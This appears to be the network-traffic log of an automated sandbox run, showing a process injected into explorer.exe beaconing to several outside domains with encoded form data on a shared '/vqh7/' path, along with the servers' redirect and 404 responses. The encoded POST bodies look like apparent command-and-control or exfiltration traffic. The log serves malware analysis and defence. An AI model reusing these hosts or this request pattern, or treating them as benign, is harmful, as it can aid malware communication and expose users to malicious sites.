                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      15192.168.2.44971081.17.29.14880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:19:06.747879028 CET156OUTPOST /vqh7/ HTTP/1.1
                                                                      Host: www.heroclassicrally.co.uk
                                                                      Connection: close
                                                                      Content-Length: 188
                                                                      Cache-Control: no-cache
                                                                      Origin: http://www.heroclassicrally.co.uk
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://www.heroclassicrally.co.uk/vqh7/
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Data Raw: 68 54 62 38 32 56 3d 6f 64 74 66 4c 34 62 54 46 73 62 69 61 4d 4f 72 6a 5a 39 37 31 41 55 73 64 41 59 54 65 4f 65 78 4b 31 61 63 48 36 34 59 75 68 47 34 61 37 41 75 57 4a 54 62 62 73 51 6e 5a 4b 33 79 6c 70 44 5a 63 74 55 53 52 42 46 38 72 76 54 48 4c 44 55 36 56 49 78 42 57 45 57 62 6b 42 6c 6c 6c 2d 6e 54 53 6d 77 43 67 6d 42 44 77 75 44 59 51 44 4a 41 34 78 7e 7a 48 48 43 35 75 31 73 48 38 36 74 54 37 37 50 4f 4d 5a 38 55 57 42 42 4d 72 30 6e 45 57 7a 32 45 4c 66 31 4a 68 48 30 51 7a 53 47 6d 74 6e 41 46 32 52 4e 65 62 67 50 48 34 4c 78 35 69 41 29 2e 00 00 00 00 00 00 00 00
                                                                      Data Ascii: hTb82V=odtfL4bTFsbiaMOrjZ971AUsdAYTeOexK1acH64YuhG4a7AuWJTbbsQnZK3ylpDZctUSRBF8rvTHLDU6VIxBWEWbkBlll-nTSmwCgmBDwuDYQDJA4x~zHHC5u1sH86tT77POMZ8UWBBMr0nEWz2ELf1JhH0QzSGmtnAF2RNebgPH4Lx5iA).
                                                                      Feb 23, 2023 11:19:06.772597075 CET157INHTTP/1.1 302 Found
                                                                      cache-control: max-age=0, private, must-revalidate
                                                                      connection: close
                                                                      content-length: 11
                                                                      date: Thu, 23 Feb 2023 10:19:05 GMT
                                                                      location: http://survey-smiles.com
                                                                      server: nginx
                                                                      set-cookie: sid=811b22a4-b363-11ed-975e-916c81d45df9; path=/; domain=.heroclassicrally.co.uk; expires=Tue, 13 Mar 2091 13:33:13 GMT; max-age=2147483647; HttpOnly
                                                                      Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                      Data Ascii: Redirecting


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      16192.168.2.44971181.17.29.14880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:19:09.346446037 CET158OUTGET /vqh7/?hTb82V=lfF/IMXZC9z0Y8i3jJMV2iASSilbfJLlfXmtIcwvtHqqMqJ7XpqTWvQhSof1n765ctlTYzJmnMi2PgJXJ8R+QD+1thlnm9XNRA==&ryQDc=vwyb4 HTTP/1.1
                                                                      Host: www.heroclassicrally.co.uk
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Feb 23, 2023 11:19:09.371157885 CET159INHTTP/1.1 200 OK
                                                                      accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                      cache-control: max-age=0, private, must-revalidate
                                                                      connection: close
                                                                      content-length: 618
                                                                      content-type: text/html; charset=utf-8
                                                                      date: Thu, 23 Feb 2023 10:19:08 GMT
                                                                      server: nginx
                                                                      set-cookie: sid=82a7aafc-b363-11ed-80a7-916cd6fc2b76; path=/; domain=.heroclassicrally.co.uk; expires=Tue, 13 Mar 2091 13:33:16 GMT; max-age=2147483647; HttpOnly
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 68 65 72 6f 63 6c 61 73 73 69 63 72 61 6c 6c 79 2e 63 6f 2e 75 6b 2f 76 71 68 37 2f 3f 63 68 3d 31 26 68 54 62 38 32 56 3d 6c 66 46 25 32 46 49 4d 58 5a 43 39 7a 30 59 38 69 33 6a 4a 4d 56 32 69 41 53 53 69 6c 62 66 4a 4c 6c 66 58 6d 74 49 63 77 76 74 48 71 71 4d 71 4a 37 58 70 71 54 57 76 51 68 53 6f 66 31 6e 37 36 35 63 74 6c 54 59 7a 4a 6d 6e 4d 69 32 50 67 4a 58 4a 38 52 2b 51 44 2b 31 74 68 6c 6e 6d 39 58 4e 52 41 25 33 44 25 33 44 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 33 4e 7a 45 31 4e 44 63 30 4f 53 77 69 61 57 46 30 49 6a 6f 78 4e 6a 63 33 4d 54 51 33 4e 54 51 35 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 44 4d 32 63 47 70 79 59 6a 52 32 4e 32 39 72 62 7a 68 72 64 6d 73 7a 4e 44 5a 78 64 57 55 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4e 7a 63 78 4e 44 63 31 4e 44 6b 73 49 6e 52 7a 49 6a 6f 78 4e 6a 63 33 4d 54 51 33 4e 54 51 35 4d 7a 55 7a 4f 44 55 7a 66 51 2e 51 67 62 6a 48 73 47 73 6d 6b 6b 4c 70 67 30 4e 4f 76 4f 64 64 68 6c 5f 69 6f 61 41 61 5a 37 67 31 71 69 63 65 69 70 33 4b 35 51 26 72 79 51 44 63 3d 76 77 79 62 34 26 73 69 64 3d 38 32 61 37 61 61 66 63 2d 62 33 36 33 2d 31 31 65 64 2d 38 30 61 37 2d 39 31 36 63 64 36 66 63 32 62 37 36 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.heroclassicrally.co.uk/vqh7/?ch=1&hTb82V=lfF%2FIMXZC9z0Y8i3jJMV2iASSilbfJLlfXmtIcwvtHqqMqJ7XpqTWvQhSof1n765ctlTYzJmnMi2PgJXJ8R+QD+1thlnm9XNRA%3D%3D&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTY3NzE1NDc0OSwiaWF0IjoxNjc3MTQ3NTQ5LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydDM2cGpyYjR2N29rbzhrdmszNDZxdWUiLCJuYmYiOjE2NzcxNDc1NDksInRzIjoxNjc3MTQ3NTQ5MzUzODUzfQ.QgbjHsGsmkkLpg0NOvOddhl_ioaAaZ7g1qiceip3K5Q&ryQDc=vwyb4&sid=82a7aafc-b363-11ed-80a7-916cd6fc2b76');</script></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.44969781.17.29.14980C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:17:57.595597029 CET94OUTGET /vqh7/?hTb82V=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4/WAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeED05Aw0pMEaxg==&ryQDc=vwyb4 HTTP/1.1
                                                                      Host: www.jewelryimpact.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Feb 23, 2023 11:17:57.623327971 CET95INHTTP/1.1 200 OK
                                                                      accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                      cache-control: max-age=0, private, must-revalidate
                                                                      connection: close
                                                                      content-length: 613
                                                                      content-type: text/html; charset=utf-8
                                                                      date: Thu, 23 Feb 2023 10:17:56 GMT
                                                                      server: nginx
                                                                      set-cookie: sid=57e3607c-b363-11ed-a2b7-916c590b0fae; path=/; domain=.jewelryimpact.com; expires=Tue, 13 Mar 2091 13:32:04 GMT; max-age=2147483647; HttpOnly
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 65 77 65 6c 72 79 69 6d 70 61 63 74 2e 63 6f 6d 2f 76 71 68 37 2f 3f 63 68 3d 31 26 68 54 62 38 32 56 3d 7a 36 57 46 7a 31 65 6b 6a 74 75 56 68 49 6e 75 53 74 63 6f 43 32 56 69 79 5a 73 46 56 62 34 25 32 46 57 41 50 31 49 63 43 59 41 63 77 32 75 6d 31 74 45 67 37 64 4f 73 67 61 52 72 67 75 49 71 7a 61 34 74 72 38 30 46 68 6e 41 30 59 79 5a 43 70 67 41 59 59 66 65 45 44 30 35 41 77 30 70 4d 45 61 78 67 25 33 44 25 33 44 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 33 4e 7a 45 31 4e 44 59 33 4e 79 77 69 61 57 46 30 49 6a 6f 78 4e 6a 63 33 4d 54 51 33 4e 44 63 33 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 44 4d 32 63 47 5a 73 62 57 74 7a 59 57 68 6b 63 47 6c 30 4d 44 41 7a 62 32 77 77 4d 6a 4d 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4e 7a 63 78 4e 44 63 30 4e 7a 63 73 49 6e 52 7a 49 6a 6f 78 4e 6a 63 33 4d 54 51 33 4e 44 63 33 4e 6a 41 32 4d 44 49 35 66 51 2e 5a 35 53 5f 30 4f 53 54 55 48 37 4f 74 68 6e 30 44 48 5f 43 42 48 45 5f 39 5f 66 4b 77 5f 72 5f 53 45 43 32 50 35 47 6f 78 74 41 26 72 79 51 44 63 3d 76 77 79 62 34 26 73 69 64 3d 35 37 65 33 36 30 37 63 2d 62 33 36 33 2d 31 31 65 64 2d 61 32 62 37 2d 39 31 36 63 35 39 30 62 30 66 61 65 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.jewelryimpact.com/vqh7/?ch=1&hTb82V=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4%2FWAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeED05Aw0pMEaxg%3D%3D&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTY3NzE1NDY3NywiaWF0IjoxNjc3MTQ3NDc3LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydDM2cGZsbWtzYWhkcGl0MDAzb2wwMjMiLCJuYmYiOjE2NzcxNDc0NzcsInRzIjoxNjc3MTQ3NDc3NjA2MDI5fQ.Z5S_0OSTUH7Othn0DH_CBHE_9_fKw_r_SEC2P5GoxtA&ryQDc=vwyb4&sid=57e3607c-b363-11ed-a2b7-916c590b0fae');</script></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.449698199.192.22.19880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:18:02.957859993 CET97OUTPOST /vqh7/ HTTP/1.1
                                                                      Host: www.specigain.online
                                                                      Connection: close
                                                                      Content-Length: 188
                                                                      Cache-Control: no-cache
                                                                      Origin: http://www.specigain.online
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://www.specigain.online/vqh7/
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Data Raw: 68 54 62 38 32 56 3d 67 33 42 74 5a 34 56 76 30 4a 31 36 31 79 6e 48 73 72 56 6f 32 46 4e 78 4a 55 30 4a 7e 67 30 4c 4e 6f 67 6a 4b 4b 79 7a 47 33 6f 71 35 42 53 47 34 39 75 69 4c 6e 7e 50 45 63 79 68 7a 38 63 4d 52 38 6c 6f 44 41 45 6a 77 71 30 4e 71 36 77 72 4f 45 65 44 73 62 49 4f 4e 4a 78 6c 77 30 56 4b 4f 71 51 5f 4e 41 33 30 50 54 78 73 54 54 46 4e 79 53 48 7a 51 51 64 5f 68 4a 56 5f 65 63 50 31 47 56 65 63 77 35 47 6d 61 70 37 5f 65 56 63 74 49 58 34 4f 70 30 6f 49 71 6a 39 61 64 62 71 6b 56 48 78 75 6b 38 51 47 41 73 69 6c 69 71 47 71 58 67 29 2e 00 00 00 00 00 00 00 00
                                                                      Data Ascii: hTb82V=g3BtZ4Vv0J161ynHsrVo2FNxJU0J~g0LNogjKKyzG3oq5BSG49uiLn~PEcyhz8cMR8loDAEjwq0Nq6wrOEeDsbIONJxlw0VKOqQ_NA30PTxsTTFNySHzQQd_hJV_ecP1GVecw5Gmap7_eVctIX4Op0oIqj9adbqkVHxuk8QGAsiliqGqXg).
                                                                      Feb 23, 2023 11:18:03.293205976 CET98INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 23 Feb 2023 10:18:03 GMT
                                                                      Server: Apache
                                                                      Content-Length: 570
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.449699199.192.22.19880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:18:06.359770060 CET99OUTGET /vqh7/?hTb82V=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmpY5IvhiyUBgJg==&ryQDc=vwyb4 HTTP/1.1
                                                                      Host: www.specigain.online
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Feb 23, 2023 11:18:06.680440903 CET99INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 23 Feb 2023 10:18:06 GMT
                                                                      Server: Apache
                                                                      Content-Length: 570
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 6e 6f 74 2d 66 6f 75 6e 64 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 73 22 3e 0a 20 20 20 20 20 20 3c 70 3e 34 30 34 3c 62 72 3e 0a 20 20 20 20 20 20 20 3c 73 6d 61 6c 6c 3e 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 73 6d 61 6c 6c 3e 0a 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 62 69 67 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 6d 65 64 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 20 73 6d 61 6c 6c 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 27 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 32 2e 31 2e 33 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Error</title> <link rel="stylesheet" href="/style.css"></head><body><body> <section id="not-found"> <div class="circles"> <p>404<br> <small>PAGE NOT FOUND</small> </p> <span class="circle big"></span> <span class="circle med"></span> <span class="circle small"></span> </div> </section> </body> <script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script><script src="/script.js"></script></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.449700148.251.13.12680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 23, 2023 11:18:20.692512035 CET101OUTPOST /vqh7/ HTTP/1.1
                                                                      Host: www.gachthe365.site
                                                                      Connection: close
                                                                      Content-Length: 188
                                                                      Cache-Control: no-cache
                                                                      Origin: http://www.gachthe365.site
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://www.gachthe365.site/vqh7/
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate
                                                                      Data Raw: 68 54 62 38 32 56 3d 6b 58 41 32 4f 57 78 66 50 69 61 69 6b 4b 65 5a 49 5f 79 44 44 47 34 53 36 70 4c 49 62 4d 43 75 63 61 75 53 49 44 65 5f 39 77 32 78 6e 65 48 69 74 78 55 34 4d 4c 4e 33 6d 73 74 52 41 77 70 49 35 6c 54 50 30 39 44 76 77 68 6e 79 74 70 48 44 6a 38 31 39 5a 78 74 75 4a 78 42 4b 55 37 75 38 45 44 38 34 62 50 51 5a 4a 6c 4c 77 43 56 68 58 33 43 5a 6a 77 75 67 54 6e 70 54 6c 69 55 4f 63 6b 50 6c 6b 4b 66 73 79 42 35 56 68 70 47 73 61 7a 31 78 54 6b 61 28 62 48 65 4b 46 38 36 38 78 4a 57 65 45 50 4a 6e 2d 65 53 73 70 66 49 33 43 31 67 29 2e 00 00 00 00 00 00 00 00
                                                                      Data Ascii: hTb82V=kXA2OWxfPiaikKeZI_yDDG4S6pLIbMCucauSIDe_9w2xneHitxU4MLN3mstRAwpI5lTP09DvwhnytpHDj819ZxtuJxBKU7u8ED84bPQZJlLwCVhX3CZjwugTnpTliUOckPlkKfsyB5VhpGsaz1xTka(bHeKF868xJWeEPJn-eSspfI3C1g).
                                                                      Feb 23, 2023 11:18:20.716753006 CET103INHTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      date: Thu, 23 Feb 2023 10:18:20 GMT
                                                                      Data Raw: 31 33 33 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a d9 72 ab ca 7a be df 4f 41 9c 4a 72 4e b1 bc 98 25 e4 63 af 04 10 02 24 81 00 09 24 94 4a ed 62 68 06 31 8a 59 4a e5 81 f2 1a 79 b2 14 b2 bd 2c cb f6 5e 3b a9 5c a4 6f 10 fd 77 7f ff fc 77 ab 9b df 7e fb ed f1 ef a6 2b 6e 63 a9 3c 14 d6 69 f2 e3 b7 c7 e7 07 04 41 d0 63 08 6c ef c7 6f 97 9f 29 a8 6d 28 ac eb e2 1e 1c 9b a8 7d ba e3 f2 ac 06 59 7d 5f 9f 0a 70 07 b9 cf 6f 4f 77 35 e8 6b 64 80 f8 1b e4 86 76 59 81 fa a9 a9 fd 7b fa ee 4b 1c db 0d c1 fd 30 bf cc 93 2b a0 2c bf 77 07 d2 97 13 d5 d2 0e 52 fb 7f 32 83 ef 8b a8 04 d5 d5 14 f4 1d 7a 66 a7 e0 e9 ae 8d 40 57 e4 65 7d 35 ac 8b bc 3a 7c f2 40 1b b9 e0 fe f2 f2 0d 8a b2 a8 8e ec e4 be 72 ed 04 3c 61 df 7f 42 d5 51 9d 80 1f 24 4a 42 4a 5e 43 b3 bc c9 bc 47 e4 b9 f3 d9 94 55 7d 4a 00 34 d8 ed c5 5c 6e 55 bd c8 31 98 da c9 bd 13 f4 ef 97 a1 c3 eb d0 fc 3c ab ef 7d 3b 8d 92 d3 03 c4 94 91 9d 7c 83 44 90 b4 a0 8e 5c fb 1b 54 d9 59 75 5f 81 32 f2 ff f6 71 5a 15 9d c1 03 84 91 45 ff 9e 98 44 19 b8 0f 41 14 84 f5 03 84 7d 27 71 9a 1a 63 24 3e 79 3f ca b1 dd 38 28 07 1d ee dd 3c c9 cb 07 e8 ef fd 4b 7b 3f ec 95 86 cf 08 9c 40 df d3 0a db f3 a2 2c 78 80 6e fa 53 bb 0c a2 ec 5d f7 7f fc 14 bf 02 6e 1d e5 d9 37 c8 cf f3 1a 94 37 f6 f0 a2 aa 48 ec d3 03 e4 24 b9 1b ff 1f b0 fb 3e c4 9f 1d 65 1f 38 3d 0b 79 9f 00 bf 7e 80 ec a6 ce df 33 7b 21 97 cf 56 fc 48 7f d3 1d c2 d0 6b 0f bc 69 fa bd 04 55 91 67 15 b8 8f 32 3f bf 51 f4 d5 ae dc a5 bd f1 be 9a 5e d5 76 dd 54 f7 6e ee 81 9b c9 97 a8 79 76 3f 85 a2 ff f0 47 b3 4b 60 57 79 f6 f5 7c 9c ba 9e 3f 84 e4 57 2e b8 92 ec 62 53 b7 be e8 f5 ed a7 67 bf 3f f3 ba 1f 0a c5 0d c3 57 6d d1 4b fb 54 de 21 96 86 c0 b0 93 cf cc 75 15 ad 25 28 80 5d 3f 40 59 7e ff fc f3 0d 6e 10 ff 6a e4 2b 57 7c 42 30 24 f3 7e d8 2b 6d 76 69 6f b4 2b 2d 6f 25 b2 bf 50 ea cf 43 dc 47 35 48 ab 1b 98 9f 91 84 a3 45 ff 21 95 a2 ec 2d 95 27 c4 17 81 76 ed 8f 1b f4 97 38 76 f2 ba ce d3 07 68 e0 f1 a6 ec cf 0a f4 52 4a 46 d7 c4 2b 4b bc c3 bf 35 c3 e0 ee 7b 0f b8 79 69 0f fe 7b 80 9a cc 03 e5 50 84 de 33 7a b5 38 89 d3 2c 77 e5 8d 2f f9 3c 84 79 0b ca ab f8 7a 2f c6 83 9f bb 4d f5 35 d9 76 eb a8 bd cd 9c 57 21 70 66 44 4e 46 6f 02 5e 09 f1 75 14 bf d6 b5 cf 1c 75 95 92 d8 17 66 6c 92 1b df fc cc b4 28 bb d4 ec 4f 6a 5e 12 55 f5 fd 65 59 19 02 3e 03 50 de d4 55 e4 81 cb cb 9b f8 83 23 5f a5 bb 29 c6 3f c3 eb aa ff 4d db 26 81 92 e8 46 2c 3f c9 87 fc 1a 2a e3 7b 0e 17 4f db 49 14 64 0f 90 0b b2 1a 94 6f f4 37 c8 ef 37 79 f3 12 f4 9f 71 ba 2c b8 0f 10 f6 55 0d 1b ea e6 7d 94 da c1 ad 1b 7f 2a f5 65 ed bd 4c 1d 76 39 51 16 dc ea 37 ac b9 dd cb fa e8 e4 89 f7 a6 c5 60 c7 6b 2d 3f da a0 cb 4b ef de 29 81 1d 3f 40 97 c7 bd 9d 24 ef 01 fe 94 56 15 28 5b 50 42 b6 e7 95 a0 ba 2d 09 5f 8b f0 66 e6 4f 97 cf eb 89 b7 1e ba 8e 91 d1 4d a9 f9 00 fb cb 24 1f 82 f1 4d ed 4f e6 47 e9 ad dd 9d bc f4 40 f9 c5 b6 e0 bb 9b 17 a7 cb 6a fb 99 b7 5e ea d3 87 e2 f5 9a ce c4 8c c4 48 e2 33 79 fe 25 05 5e 64 43 7f 49 a3 ec 79 7f f7 00 8d 47 74 d1 ff f5 86 cd 6d d4 de 90 07 e3 15 79 75 59 a1 1e a0 12 24 f6 50 5c de 18 0e f4 a1 0d 15 cb 4f f2 ee 01 0a 23 cf 03 d9 c7 11 57 eb d3 25 b2 9f f3 fa fd b8 37 